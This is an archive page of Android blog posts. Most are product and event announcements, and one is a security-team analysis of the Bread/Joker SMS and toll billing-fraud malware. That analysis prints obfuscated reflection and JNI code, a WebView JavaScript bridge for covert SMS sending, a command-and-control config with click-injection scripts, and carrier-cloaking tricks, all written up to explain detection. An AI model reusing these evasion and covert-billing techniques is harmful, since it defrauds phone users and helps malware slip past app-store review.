Tag Archives: Android

Flashing Builds from the Android Open Source Project

Posted by Mitchell Wills, Android Build Software Engineer

AOSP has been around for a while, but flashing builds onto a development device has always required a number of manual steps. A year ago we launched Android's Continuous Integration Dashboard, which gives more visibility into the continuous build status of the AOSP source tree. However, these builds were not available for phones and flashing devices still required a manual command line process.

In order to support developers working in AOSP we are launching Android Flash Tool, which allows developers to flash devices with builds listed on the Continuous Integration Dashboard. This can be used by developers working on the Android OS to test changes or App developers to test compatibility with the latest AOSP build.

installing build

A device being flashed.

Android Flash Tool allows anyone to use a browser supporting WebUSB, such as Chrome 79 or Edge 79, to flash an Android device entirely from the browser (Windows requires installing a driver). After connecting a device and authorizing the page to connect to it users will be presented with a list of available builds. After choosing a build click flash and the tool does the rest. You can flash recent Pixel devices and the HiKey reference boards with builds based on aosp-master.

Try Android Flash Tool yourself at https://flash.android.com.

Find out more at https://source.android.com/setup/contribute/flash.

Get ready for the Game Developers Conference

Posted by Kacey Fahey, Games Developer Marketing, Google

Cross-posting from the Google Developers Blog.

Google For Games at GDC March 16-20, 2020

Join us online or live* at the Google Developer Summits during the Game Developers Conference on March 16 and 17 to learn about the latest tools and updates to build great games, reach more players, and improve discovery of your game.

Google has lots to share with the game development community at the Game Developers Conference (GDC) in March. Check out our plans and sign up to keep up to date with the latest GDC news and announcements from Android, Google Play, Firebase, and more.

For one week, tens of thousands of creators from the gaming community come together at GDC to hear the latest industry innovations and network with peers to enable better gaming experiences for players around the world.

Below is a preview of what to expect from Google, and remember, it’s just the beginning. Don’t forget to sign up for our newsletter as we reveal more leading up to the event, or you can check out our website, Google for Games at GDC.

Google for Games Keynote

We will start the week with the Google for Games Keynote on Monday, March 16 at 9:30 am PST. Join the livestream and learn about the latest tools and solutions to help game developers create great games, connect with players, and scale their businesses.

GDC 2019 Keynote picture

Google Developer Keynote photo at GDC 2019

Google Developer Summit

We have two days of in-depth sessions where you can uplevel your skills across Google products and solutions. Topics range from new tools to optimize game development, how to reach more devices and players, using new Firebase features to alleviate infrastructure management challenges, and much more.

Learn more about the Google Developer Summit we’ll be hosting on March 16 -17 and how you can join in person with an official GDC ticket or via livestream.

We’ll be sharing more details about everything we have planned at GDC in the coming weeks so be sure to sign up to be among the first to hear the latest updates, and save the date to watch the keynote and other Developer Summit sessions at g.co/gdc2020.

More to come soon!

The Google for Games team

*On-site events are part of the official Game Developers Conference and require a pass to attend.

PHA Family Highlights: Bread (and Friends)

Posted by Alec Guertin and Vadim Kotov, Android Security & Privacy Team
In this edition of our PHA Family Highlights series we introduce Bread, a large-scale billing fraud family. We first started tracking Bread (also known as Joker) in early 2017, identifying apps designed solely for SMS fraud. As the Play Store has introduced new policies and Google Play Protect has scaled defenses, Bread apps were forced to continually iterate to search for gaps. They have at some point used just about every cloaking and obfuscation technique under the sun in an attempt to go undetected. Many of these samples appear to be designed specifically to attempt to slip into the Play Store undetected and are not seen elsewhere. In this post, we show how Google Play Protect has defended against a well organized, persistent attacker and share examples of their techniques.

TL;DR

  • Google Play Protect detected and removed 1.7k unique Bread apps from the Play Store before ever being downloaded by users
  • Bread apps originally performed SMS fraud, but have largely abandoned this for WAP billing following the introduction of new Play policies restricting use of the SEND_SMS permission and increased coverage by Google Play Protect
  • More information on stats and relative impact is available in the Android Security 2018 Year in Review report

BILLING FRAUD

Bread apps typically fall into two categories: SMS fraud (older versions) and toll fraud (newer versions). Both of these types of fraud take advantage of mobile billing techniques involving the user’s carrier.

SMS Billing

Carriers may partner with vendors to allow users to pay for services by SMS. The user simply needs to text a prescribed keyword to a prescribed number (shortcode). A charge is then added to the user’s bill with their mobile service provider.

Toll Billing

Carriers may also provide payment endpoints over a web page. The user visits the URL to complete the payment and enters their phone number. Verification that the request is coming from the user’s device is completed using two possible methods:
  1. The user connects to the site over mobile data, not WiFi (so the service provider directly handles the connection and can validate the phone number); or
  2. The user must retrieve a code sent to them via SMS and enter it into the web page (thereby proving access to the provided phone number).

Fraud

Both of the billing methods detailed above provide device verification, but not user verification. The carrier can determine that the request originates from the user’s device, but does not require any interaction from the user that cannot be automated. Malware authors use injected clicks, custom HTML parsers and SMS receivers to automate the billing process without requiring any interaction from the user.

STRING & DATA OBFUSCATION

Bread apps have used many innovative and classic techniques to hide strings from analysis engines. Here are some highlights.

Standard Encryption

Frequently, Bread apps take advantage of standard crypto libraries in `java.util.crypto`. We have discovered apps using AES, Blowfish, and DES as well as combinations of these to encrypt their strings.

Custom Encryption

Other variants have used custom-implemented encryption algorithms. Some common techniques include: basic XOR encryption, nested XOR and custom key-derivation methods. Some variants have gone so far as to use a different key for the strings of each class.

Split Strings

Encrypted strings can be a signal that the code is trying to hide something. Bread has used a few tricks to keep strings in plaintext while preventing basic string matching. 
String click_code = new StringBuilder().append(".cli").append("ck();");
Going one step further, these substrings are sometimes scattered throughout the code, retrieved from static variables and method calls. Various versions may also change the index of the split (e.g. “.clic” and “k();”).

Delimiters

Another technique to obfuscate unencrypted strings uses repeated delimiters. A short, constant string of characters is inserted at strategic points to break up keywords: 
String js = "javm6voTascrm6voTipt:window.SDFGHWEGSG.catcm6voThPage(docm6voTument.getElemm6voTentsByTm6voTagName('html')[m6voT0].innerHTML);"
At runtime, the delimiter is removed before using the string: 
js = js.replaceAll("m6voT", "");

API OBFUSCATION

SMS and toll fraud generally requires a few basic behaviors (for example, disabling WiFi or accessing SMS), which are accessible by a handful of APIs. Given that there are a limited number of behaviors required to identify billing fraud, Bread apps have had to try a wide variety of techniques to mask usage of these APIs.

Reflection

Most methods for hiding API usage tend to use Java reflection in some way. In some samples, Bread has simply directly called the Reflect API on strings decrypted at runtime. 
Class smsManagerClass = Class.forName(p.a().decrypt("wI7HmhUo0OYTnO2rFy3yxE2DFECD2I9reFnmPF3LuAc="));  // android.telephony.SmsManager
smsManagerClass.getMethod(p.a().decrypt("0oXNjC4kzLwqnPK9BiL4qw=="),  // sendTextMessage   
                          String.class, String.class, String.class, PendingIntent.class, PendingIntent.class).invoke(smsManagerClass.getMethod(p.a().decrypt("xoXXrB8n1b0LjYfIYUObrA==")).invoke(null), addr, null, message, null, null);  // getDefault

JNI

Bread has also tested our ability to analyze native code. In one sample, no SMS-related code appears in the DEX file, but there is a native method registered. 
 public static native void nativesend(String arg0, String arg1);
Two strings are passed into the call, the shortcode and keyword used for SMS billing (getter methods renamed here for clarity). 
    JniManager.nativesend(this.get_shortcode(), this.get_keyword());
In the native library, it stores the strings to access the SMS API.
The nativesend method uses the Java Native Interface (JNI) to fetch and call the Android SMS API. The following is a screenshot from IDA with comments showing the strings and JNI functions.

WebView JavaScript Interface

Continuing on the theme of cross-language bridges, Bread has also tried out some obfuscation methods utilizing JavaScript in WebViews. The following method is declared in the DEX. 
    public void method1(String p7, String p8, String p9, String p10, String p11) { 
            Class v0_1 = Class.forName(p7);
            Class[] v1_1 = new Class[0];
            Object[] v3_1 = new Object[0];
            Object v1_3 = v0_1.getMethod(p8, v1_1).invoke(0, v3_1);
            Class[] v2_2 = new Class[5];
            v2_2[0] = String.class;
            v2_2[1] = String.class;
            v2_2[2] = String.class;
            v2_2[3] = android.app.PendingIntent.class;
            v2_2[4] = android.app.PendingIntent.class;
            reflect.Method v0_2 = v0_1.getMethod(p9, v2_2);
            Object[] v2_4 = new Object[5];
            v2_4[0] = p10;
            v2_4[1] = 0;
            v2_4[2] = p11;
            v2_4[3] = 0;
            v2_4[4] = 0;
            v0_2.invoke(v1_3, v2_4);
    }
Without context, this method does not reveal much about its intended behavior, and there are no calls made to it anywhere in the DEX. However, the app does create a WebView and registers a JavaScript interface to this class. 
this.webView.addJavascriptInterface(this, "stub");
This gives JavaScript run in the WebView access to this method. The app loads a URL pointing to a Bread-controlled server. The response contains some basic HTML and JavaScript.
In green, we can see the references to the SMS API. In red, we see those values being passed into the suspicious Java method through the registered interface. Now, using these strings method1 can use reflection to call sendTextMessage and process the payment.

PACKING

In addition to implementing custom obfuscation techniques, apps have used several commercially available packers including: Qihoo360, AliProtect and SecShell.
More recently, we have seen Bread-related apps trying to hide malicious code in a native library shipped with the APK. Earlier this year, we discovered apps hiding a JAR in the data section of an ELF file which it then dynamically loads using DexClassLoader.
The figure below shows a fragment of encrypted JAR stored in .rodata section of a shared object shipped with the APK as well as the XOR key used for decryption.
After we blocked those samples, they moved a significant portion of malicious functionality into the native library, which resulted in a rather peculiar back and forth between Dalvik and native code:

COMMAND & CONTROL

Dynamic Shortcodes & Content

Early versions of Bread utilized a basic command and control infrastructure to dynamically deliver content and retrieve billing details. In the example server response below, the green fields show text to be shown to the user. The red fields are used as the shortcode and keyword for SMS billing.

State Machines

Since various carriers implement the billing process differently, Bread has developed several variants containing generalized state machines implementing all possible steps. At runtime, the apps can check which carrier the device is connected to and fetch a configuration object from the command and control server. The configuration contains a list of steps to execute with URLs and JavaScript. 
{
   "message":"Success",
   "result":[
      {
         "list":[
            {
               "endUrl":"http://sabai5555.com/",
               "netType":0,
               "number":1,
               "offerId":"1009",
               "step":1,
               "trankUrl": "http://atracking-auto.appflood.com/transaction/post_click?offer_id=19190660&aff_id=10336"
            },
            {
               "netType":0,
               "number":2,
               "offerId":"1009",
               "params":"function jsFun(){document.getElementsByTagName('a')[1].click()};",
               "step":2
            },
            {
               "endUrl":"http://consentprt.dtac.co.th/webaoc/InformationPage",
               "netType":0,
               "number":3,
               "offerId":"1009",
               "params":"javascript:jsFun()",
               "step":4
            },
            {
               "endUrl":"http://consentprt.dtac.co.th/webaoc/SuccessPage",
               "netType":0,
               "number":4,
               "offerId":"1009",
               "params":"javascript:getOk()",
               "step":3
            },
            {
               "netType":0,
               "number":5,
               "offerId":"1009",
               "step":7
            }
         ],
         "netType":0,
         "offerId":"1009"
      }
   ],
   "code":"200"
}
The steps implemented include:
  • Load a URL in a WebView
  • Run JavaScript in WebView
  • Toggle WiFi state
  • Toggle mobile data state
  • Read/modify SMS inbox
  • Solve captchas

Captchas

One of the more interesting states implements the ability to solve basic captchas (obscured letters and numbers). First, the app creates a JavaScript function to call a Java method, getImageBase64, exposed to WebView using addJavascriptInterface.
The value used to replace GET_IMG_OBJECT comes from the JSON configuration. 
"params": "document.getElementById('captcha')"
The app then uses JavaScript injection to create a new script in the carrier’s web page to run the new function.
The base64-encoded image is then uploaded to an image recognition service. If the text is retrieved successfully, the app uses JavaScript injection again to submit the HTML form with the captcha answer.

CLOAKING

Client-side Carrier Checks

In our basic command & control example above, we didn’t address the (incorrectly labeled) “imei” field. 
{
 "button": "ยินดีต้อนรับ",
 "code": 0,
 "content": "F10",
 "imei": "52003,52005,52000",
 "rule": "Here are all the pictures you need, about           
              happiness, beauty, beauty, etc., with our most        
              sincere service, to provide you with the most 
              complete resources.",
 "service": "4219245"
}
This contains the Mobile Country Code (MCC) and Mobile Network Code (MNC) values that the billing process will work for. In this example, the server response contains several values for Thai carriers. The app checks if the device’s network matches one of those provided by the server. If it does, it will commence with the billing process. If the value does not match, the app skips the “disclosure” page and billing process and brings the user straight to the app content.
In some versions, the server would only return valid responses several days after the apps were submitted.

Server-side Carrier Checks

In the JavaScript bridge API obfuscation example covered above, the server supplied the app with the necessary strings to complete the billing process. However, analysts may not always see the indicators of compromise in the server’s response.
In this example, the requests to the server take the following form: 
http://X.X.X.X/web?operator=52000&id=com.battery.fakepackage&deviceid=deadbeefdeadbeefdeadbeefdeadbeef
Here, the “operator” query parameter is the Mobile Country Code and Mobile Network Code . The server can use this information to determine if the user’s carrier is one of Bread’s targets. If not, the response is scrubbed of the strings used to complete the billing fraud. 
<a onclick="Sub()">ไปเดี๋ยวนี้</a>
<div style="display:none">
    <p id="deviceid">deadbeefdeadbeefdeadbeefdeadbeef</p>
    <p id="cmobi"></p>
    <p id="deni"></p>
    <p id="ssm"></p>
    <p id="shortcode"></p>
    <p id="keyword"></p>
</div>

MISLEADING USERS

Bread apps sometimes display a pop-up to the user that implies some form of compliance or disclosure, showing terms and conditions or a confirm button. However, the actual text would often only display a basic welcome message.
Translation: “This app is a place to be and it will feel like a superhero with this new app. We hope you enjoy it!”
Other versions included all the pieces needed for a valid disclosure message.
When translated the disclosure reads:
“Apply Car Racing Clip \n Please enter your phone number for service details. \n Terms and Conditions \nFrom 9 Baht / day, you will receive 1 message / day. \nPlease stop the V4 printing service at 4739504 \n or call 02-697-9298 \n Monday - Friday at 8.30 - 5.30pm \n”
However, there are still two issues here:
  1. The numbers to contact for cancelling the subscription are not real
  2. The billing process commences even if you don’t hit the “Confirm” button
Even if the disclosure here displayed accurate information, the user would often find that the advertised functionality of the app did not match the actual content. Bread apps frequently contain no functionality beyond the billing process or simply clone content from other popular apps.

VERSIONING

Bread has also leveraged an abuse tactic unique to app stores: versioning. Some apps have started with clean versions, in an attempt to grow user bases and build the developer accounts’ reputations. Only later is the malicious code introduced, through an update. Interestingly, early “clean” versions contain varying levels of signals that the updates will include malicious code later. Some are first uploaded with all the necessary code except the one line that actually initializes the billing process. Others may have the necessary permissions, but are missing the classes containing the fraud code. And others have all malicious content removed, except for log comments referencing the payment process. All of these methods attempt to space out the introduction of possible signals in various stages, testing for gaps in the publication process. However, GPP does not treat new apps and updates any differently from an analysis perspective.

FAKE REVIEWS

When early versions of apps are first published, many five star reviews appear with comments like:


“So..good..”
“very beautiful”
Later, 1 star reviews from real users start appearing with comments like:
“Deception”
“The app is not honest …”

SUMMARY

Sheer volume appears to be the preferred approach for Bread developers. At different times, we have seen three or more active variants using different approaches or targeting different carriers. Within each variant, the malicious code present in each sample may look nearly identical with only one evasion technique changed. Sample 1 may use AES-encrypted strings with reflection, while Sample 2 (submitted on the same day) will use the same code but with plaintext strings.
At peak times of activity, we have seen up to 23 different apps from this family submitted to Play in one day. At other times, Bread appears to abandon hope of making a variant successful and we see a gap of a week or longer before the next variant. This family showcases the amount of resources that malware authors now have to expend. Google Play Protect is constantly updating detection engines and warning users of malicious apps installed on their device.

SELECTED SAMPLES

Package Name SHA-256 Digest
com.rabbit.artcamera 18c277c7953983f45f2fe6ab4c7d872b2794c256604e43500045cb2b2084103f
org.horoscope.astrology.predict 6f1a1dbeb5b28c80ddc51b77a83c7a27b045309c4f1bff48aaff7d79dfd4eb26
com.theforest.rotatemarswallpaper 4e78a26832a0d471922eb61231bc498463337fed8874db5f70b17dd06dcb9f09
com.jspany.temp 0ce78efa764ce1e7fb92c4de351ec1113f3e2ca4b2932feef46d7d62d6ae87f5
com.hua.ru.quan 780936deb27be5dceea20a5489014236796a74cc967a12e36cb56d9b8df9bc86
com.rongnea.udonood 8b2271938c524dd1064e74717b82e48b778e49e26b5ac2dae8856555b5489131
com.mbv.a.wp 01611e16f573da2c9dbc7acdd445d84bae71fecf2927753e341d8a5652b89a68
com.pho.nec.sg b4822eeb71c83e4aab5ddfecfb58459e5c5e10d382a2364da1c42621f58e119b

Enter the Indie Games Festival from Google Play

Posted by Patricia Correa, Director, Developer Marketing

Indie Games Festival banner

The indie developer community released several fantastic titles on Google Play during 2019, showing the technical skill and innovative design that makes them an essential part of the gaming landscape.

To continue helping indie developers thrive, today we’re announcing the 2020 edition of our annual Google Play Indie Games Festival. This year we will host three competitions for developers from several European countries*, Japan, and South Korea.

Prizes:

Prizes are designed to help you grow your business, including:

  • The chance to exhibit at the final events in Warsaw, Tokyo or Seoul
  • Promotions on the Google Play Store
  • Promotions on our consumer and developer-facing channels
  • Access to exclusive developer-focused Google events
  • Personalized consultation sessions with Google team members
  • And more!

Eligibility:

The contests are open to developers from selected countries, with no more than 50 employees. The submitted game must be new, released at least in open beta between May 7, 2019 and March 2, 2020. See other requirements in the terms and conditions for each of the contests.

Process:

process banner for Indie Games Festival

Simply fill out the relevant form by clicking here. Submissions are open until March 2, 2020, at 3pm CET.

The Top 20 entries in each region will be announced in March and invited to showcase at the Festival events where the field will be narrowed to 10 by the event audience, industry experts and the Google team. The Top 10 will present their games on stage and the 3 winners will be selected.

Not submitting a game? Come and take part:

Even if you’re not submitting a game to the competitions, we’d love to see you at one of the Festival events on the 25th of April 2020.

Learn more and sign up on g.co/play/indiefestival

* The European competition is open to developers from the following countries: Austria, Belgium, Belarus, Bulgaria, Croatia, Czech Republic, Denmark, Estonia, Finland, France, Germany, Hungary, Israel, Italy, Latvia, Lithuania, Netherlands, Norway, Poland, Portugal, Romania, Russia, Slovakia, Slovenia, Spain, Sweden, Turkey, Ukraine, and the United Kingdom (including Northern Ireland).

How useful did you find this blog post?

#IMakeApps: One developer’s life on the road

Sterling Udell and his wife Teresa always loved to travel and the opportunity to hit the road full-time was a dream for them. At some point, they realized that software development was a remote-friendly job, and decided not to put off traveling any longer. Check out more #IMakeApps stories on g.co/play/imakeapps.

What kickstarted your nomadic lifestyle? 

I’ve always loved travel, and my wife and I used to dream about someday making it work as a lifestyle. Then, a serious health issue brought home that there might not be a “someday.” I was already working remotely as a programmer, and we realized that it would be possible to kit out an RV to support doing so on the road. So we took the plunge!

How do you juggle your lifestyle with your work as a developer? 

Being an independent developer gives me lots of flexibility in how I work, and we’re pretty flexible in our travel as well, so it’s not too difficult to fit the two together. Our preferred mode of travel is to park up for a few days in one location, where I’ll tend to work on apps most days, with some time off for getting to know the area as well. Then we’ll pack up and move on to somewhere else⁠—seeing the sights along the way⁠—and start the cycle over. 

Does your lifestyle inspire or influence the types of apps you create? 

Absolutely. We spend a lot of time outdoors, and that makes you very aware of the natural passage of time: day into night, summer into winter, then back around again. Not to mention, if you’re spending time outdoors, there’s a practical side to knowing what time the sun will rise, or when the daylight will fade. This was the basis of TerraTime, an app that displays the natural flow of sunlight, clouds, seasons and beyond, accessible in the palm of your hand. And Lunescope works  similarly, but for the phases of the moon. Both apps are focused on showcasing the world’s  natural rhythm.

What app are you working on at the moment?  

I’m currently working on a major update to TerraTime Pro, adding a feature that many folks have requested. The focus of the app has always been to help people connect with the world we live in, linking our human understanding of time with the natural cycles that underpin it. Without giving too much away, the new feature should further that goal⁠—on a global scale⁠—as well as making the app more useful day-to-day.

What has been your experience creating apps on Android and distributing them through Google Play? 

I was drawn to developing for Android specifically by unique platform features, like widgets and live wallpapers, that I wanted to include in my early apps. As my portfolio has grown, I’ve continued to leverage such features into apps that wouldn’t be possible anywhere except Android. I think that’s what’s kept me on the platform for the last 10 years: the unique possibilities that it offers. 

Source: Android


Reflections and resolutions for a healthier 2020

The beginning of the new year is a great time to reflect on what’s most important to you. Taking better care of yourself is a common New Year's resolution, but let’s be real—making resolutions is often easier than keeping them. One thing we know: New habits that are repeatable and achievable are the ones that end up sticking. 

At Google, we believe that great technology should improve life, not distract from it, and we’ve heard from people that their health can be impacted by their phone use. That’s why we’ve built digital wellbeing tools and features into our products to help you unplug, minimize digital distractions and focus better when using technology. In 2019, we talked to more than 100,000 people to understand their priorities. Most people told us they need free time for themselves, quality time with others and focused time for work or school. 

This year, we encourage you to reflect on the role that technology plays in your life and set resolutions for how and when you use your phone. Everyone has a unique definition of what balanced tech use looks like, so no matter what your goals are, here are some of the steps you can take to bring digital wellbeing into your life in 2020.  

Woman walking around her home, texting and using phone, getting ready for bed, turning on focus mode and grayscale features.

Free up time for yourself

  • To stop using your phone before bed (or in bed), set a bedtime schedule with Android’s Wind Down, which automatically turns on Do Not Disturb and fades the screen to Grayscale at your chosen bedtime. (Check out this video to see how it works.)

  • Double down on your sleep goals by setting up your personal routine with Google Assistant. Simply say “hey Google, bedtime,” and it can automatically put your phone on silent, adjust lights, set an alarm and tell you about your schedule for the next day. 

  • Silence your notifications on YouTube during your preferred quiet hours.

  • Schedule internet breaks on specific devices or manage screen time by pausing Wi-Fi during bedtime or dinnertime with Google WiFi. Or just ask your Google Assistant to pause the internet connection. 

Spend quality time with your VIPs 

  • To quickly silence all notifications, including phone calls, turn on Do Not Disturb. You can choose to allow calls from the people you have “starred” in your contacts list in case close family and friends need to reach you. Or, if you use the Pixel 2, 3, or 4, simply Flip to Shhh by turning your phone face down on the table to automatically enable Do Not Disturb.  

  • Set digital ground rules and screen time limits for everyone in the household (and monitor their use) with Google Family Link. You can lock a device at bedtime, or simply when you think your child needs a break. Starting with Android 10, Family Link is standard in every Android phone. 

Find focus for work or school

  • With the new Focus mode on Android, you can switch off distractions by silencing the apps that most often require your attention—like email, social media, or the news—so you can get more done in less time. Set up a recurring schedule to make it a habit. 

  • If you have a goal to reduce the time you spend on your device, try using Google Assistant. With just your voice, you can quickly send messages, ask about traffic, organize your tasks and remind yourself to call your parents.

  • To limit the number of email alerts you receive from Gmail, you can turn on high-priority notifications and only get notified when it’s important. Turn on Priority Inbox to automatically organize your emails into categories so you can quickly see the most important ones first.

  • Spend less time writing and responding to emails by using Smart Compose on Gmail. It lets you quickly draft an email by suggesting words and phrases as you write, and Smart Reply saves you time by suggesting quick responses to your messages. 

We know that digital wellbeing is extremely personal and that it doesn’t come with a one-size-fits-all solution, but hopefully these tools can help you achieve your specific goals. To learn more, visit wellbeing.google

Source: Android


Kotlin/Everywhere – it’s a wrap!

Posted by Florina Muntenescu, Developer Advocate (@FMuntenescu)

At Google I/O 2019 we announced that Android development will become increasingly Kotlin-first. Together with JetBrains, we also launched Kotlin/Everywhere - a global series of community led events focusing on the potential of using Kotlin everywhere; on Android, servers, web front-end and other platforms.

Kotlin/Everywhere events took place from May through December and we want to thank everyone for getting involved

?‍??‍?30,000+ developers participated in-person at Kotlin/Everywhere events

??200,000 views of live-streams and event recordings like Kotlin/Everywhere Bengaluru, Minsk, Chicago, Buenos Aires and more.

? 500+ events: from short evening meetups, half-day sessions, and full day events, to Kotlin/Everywhere tracks at larger events like DevFests, or even StudyJams that spanned several weeks.

?~30 speakers from Google and JetBrains gave ~70 talks at events around the world.

? 85+ countries: from United States to Chile, Kenya, Greece, Taiwan, New Zealand and so many more, with some countries hosting 1-2 events to some hosting dozens: Nigeria - 38, China - 27, India - 25 just to name a few.

? Many of the resources used or created for Kotlin/Everywhere by Google and JetBrains are available online:

General Kotlin:

Kotlin in Android:

Kotlin in Google Cloud Platform:

Multi-platform Kotlin:

We’re grateful for this engagement with Kotlin from communities around the world, as well as for all the organisers, speakers and attendees who made these events possible! To participate in more Kotlin events, check out JetBrains’ KotlinConf’19 Global initiative, happening through March 2020.

With all of the resources available, there’s never been a better time to adopt Kotlin… Everywhere!

The Interactive Media Ads (IMA) SDK for Android moves to Google’s Maven repository

With the release of version 3.16.0 of the Interactive Media Ads SDK (IMA SDK) for Android, the location where we host the SDK has changed to Google's Maven Repository.

As a result of this change, your Android project should include a reference to the google() repository (Google's Maven Repository) as a dependency. Previously, the SDK was hosted on JCenter. You can now remove the jcenter() reference from your Android project’s build.gradle file, as long as none of your other dependencies are hosted there.

The google() repository should be referenced in the project-level build.gradle file of your project. You should then import the IMA SDK in the app/build.gradle file. See an example in the following code snippet from the Adding the IMA Android SDK to the player app section of the Android IMA SDK getting started guide. 

repositories {
    google()
}

dependencies {
    implementation 'androidx.appcompat:appcompat:1.1.0'
    implementation 'com.google.ads.interactivemedia.v3:interactivemedia:3.16.0'
}

Another change that comes from this update is that the com.google.android.gms:play-services-ads-identifier target is now included as a dependency of the IMA SDK and is no longer required to be explicitly included in the app/build.gradle file.

If you have questions about the IMA SDK for Android, please see the SDK documentation, or reach out to us on the IMA SDK forum.

 - Jackson Sui, Interactive Media Ads Developer Relations

Our highlights from Android & Google Play in 2019 – building for the next decade

Posted by Patricia Correa, P&E Developer Marketing Director

The last 12 months have seen Google Play continue to grow, with over 116 billion downloads of the apps and games that you created.

We’ve been working hard to build the latest technology and tools for modern Android development and distribution, improving Google Play and the Play Console to offer you new and better ways for your app to be discovered, promoted, and monetized.

A key focus has been addressing the challenge of keeping users safe and maintaining trust in Google Play.

Modern Android development

We are focused on building great tools and services and your feedback is crucial in helping us do so. You have told us that you love Android’s openness, but we have also heard that you would like us to marry it with an opinion about the right way to do things. We call this approach modern Android development: opinionated and powerful, for fast, easy development, taking away everything that slows you down so you can focus on building incredible experiences. You can see modern Android development come to life in a number of investments we made this year:

  • We previewed Jetpack Compose, a modern declarative UI toolkit built for the next 10 years. Inspired by Kotlin, Compose makes it easy to build beautiful, native apps with code that is more intuitive and concise. Check out the Compose tutorial to learn more.
  • This year, Android Jetpack saw many stable library releases from background scheduling with WorkManager, in-app navigation with Navigation to app performance measurement with Benchmark . In 2019 , we also gave you early versions of more building blocks for your production apps with Jetpack CameraX library, BiometricPrompt and encryption & security. Check them all out here.
  • For everyone who wants to get started with Kotlin there are a range of courses available on Udacity. We’ve added the Advanced Android course with Kotlin to help every developer grow their skills and get the most from Kotlin. For those who are already experts, we’re launching a new Android Developer Certification in Kotlin, which is available at a discount until early 2020.
  • We recently released the first canary version of Android Studio 4.0 with powerful, integrated tooling support for Compose. It also has a new Motion Editor, Java 8 Language library desugaring, full support for KTS files, Kotlin live templates, and more.

Android 10

Android 10, released earlier this year, is built around three important themes. First, Android 10 is shaping the leading edge of mobile innovation with advanced machine-learning and support for emerging devices like foldables and 5G enabled phones. Next, Android 10 has a central focus on privacy and security, with almost 50 features that give users greater protection, transparency, and control. Finally, Android 10 expands users' digital wellbeing controls so individuals and families can find a better balance with technology.

Modern app and game distribution

We introduced Android App Bundles last year as a mechanism to simplify and streamline app distribution, overcome the constraints of APK publishing, and introduce advanced distribution features such as dynamic delivery. There are now over 300K app bundle apps and games in production, covering nearly 30% of all active installs. If this doesn’t include your app or game, check out 16 reasons to publish your apps and games with the Android App Bundle.

This year we’ve made it much easier to test and implement app bundles and dynamic delivery. Internal app sharing makes it easy to share test builds with others. You can easily grant anyone on your team the ability to upload a test build to Play and get a download link to share with your testers. With internal app sharing, you can be sure that each device is receiving exactly what Play would deliver in the wild. You don’t need to use version codes or the prod signing key, and can even upload debuggable artifacts.You can also get download links for old versions of your app from the Play Console, whether they’re app bundles or APKs.

Protecting the ecosystem

In 2019, you helped us make Google Play even safer, building user trust in your apps and Google Play as a whole. Thanks to your hard work, we have:

  • Made Google Play safer for children and families by helping ensure apps and games for children have appropriate content, show suitable ads, and handle personally identifiable information correctly.
  • Reduced access to sensitive data by restricting SMS and call log permissions to apps whose core functionality needs them, resulting in 98% fewer apps accessing this sensitive data.

To help you protect your apps, we’ve improved our ability to detect impersonators, repackaging, bad content, and other forms of abuse. Additionally, we’re investing in resources like policy-focused Play Academy courses to help you better understand and navigate our policy changes.

Because the threats are always changing, it’ll take all of us working together to keep users safe and our platform secure. Thank you for continuing to work with us on this.

Building better app businesses

During 2019 we continued to look for new ways to help you market and monetize your apps and games:

  • Google Play got a visual refresh which improves app discovery and accessibility for the wide diversity of store visitors.
  • App tags improve discoverability, enabling you to describe the content and functionality of your game with up to five tags.
  • Your app’s rating is now weighted towards your most recent ratings, instead of a lifetime cumulative average, so that it better reflects your app’s current state.
  • Improved and more granular benchmarks in the Google Play Console’s User Acquisition-, Ratings-, and Android Vitals-reports; and new benchmarks for core statistics against 200 curated peer-sets; with period-on-period growth rates, including user and device acquisitions, churn, actives, and more.
  • If you’re using subscriptions, the pause subscription report offers you new insights including the length users paused for and whether they returned or churned at the end of their pause period.
  • We expanded our buyer support so you can now sell apps and games to people in Bermuda, British Virgin Islands, Cayman Islands, Iraq, and Turks and Caicos. We also welcomed many new developers to the Google Play Store’s family with Seller Support, with more than 35 additional countries launched this year. Find out more.

And that’s a wrap

With such scale comes responsibility. We’re committed to ensuring our users’ safety for the future, to making development easier and distribution faster, and to offering you more effective ways for your app to be discovered and monetized.

On this note, we hope we can all continue working together to make Android and Google Play better for billions of people around the world, in 2020, and the years to come. From everyone on our team, we wish you all a happy holiday season and a prosperous new year.

How useful did you find this blog post?

Bringing the art of movement to the world

Rosa Mei is a professional dancer and martial artist who creates apps to teach movement: 7 Minute Chi, Meditation Moves, Taichi Temple, Gymnast Fit and Super Funky. Check out more #IMakeApps stories on g.co/play/imakeapps.

What types of apps do you make?

I make apps that teach busy people how to move and meditate. Even if you only have five minutes a day to train, you can progress. People can do moving meditation in seven minutes, learn a new dance in one minute, learn all the fundamentals of tai chi in two hours, or train like a gymnast in a rigorous 10-minute set. These short, yet high-impact training sets let people fit them into their hectic lives. They can also customize their training to what they enjoy most. 

How did you get into dance and martial arts? 

I always had too much energy and was gumby levels of flexible. My parents were engineers and really didn’t understand why I wanted to dance. I got full scholarships to study electrical engineering and Russian linguistics, but I chose dance because it fascinated me more than anything else in the universe. My mom was an IBM engineer and was so embarrassed by my career choice, she told her colleagues her daughter studied “dance law.”  I said, “What’s that, ma? Gravity?”

What eventually interested you in technology and making apps? 

Before I made apps, I worked in multimedia design for about 15 years; I’m a compulsive creator. I’m really great at making site-specific dance operas and in a sense, apps are the ultimate site-specific tool.  You can train in your kitchen while making coffee, or on top of Mount Kilimanjaro. 

How do you balance your dance and martial arts passions and your app business? 

I practice my dance and martial arts training really early in the morning and  teach classes and workshops in the evenings and on weekends. I design my apps during the day and work with additional software engineers pretty much around the clock.

What has it been like using Android and Google Play to create and distribute your apps?

Google Play is an amazing platform for developers because it really gives you complete freedom to create—and then your product gets put in front of a worldwide community. And Android devices are affordable and state-of-the-art, giving developers  a wider reach and impact.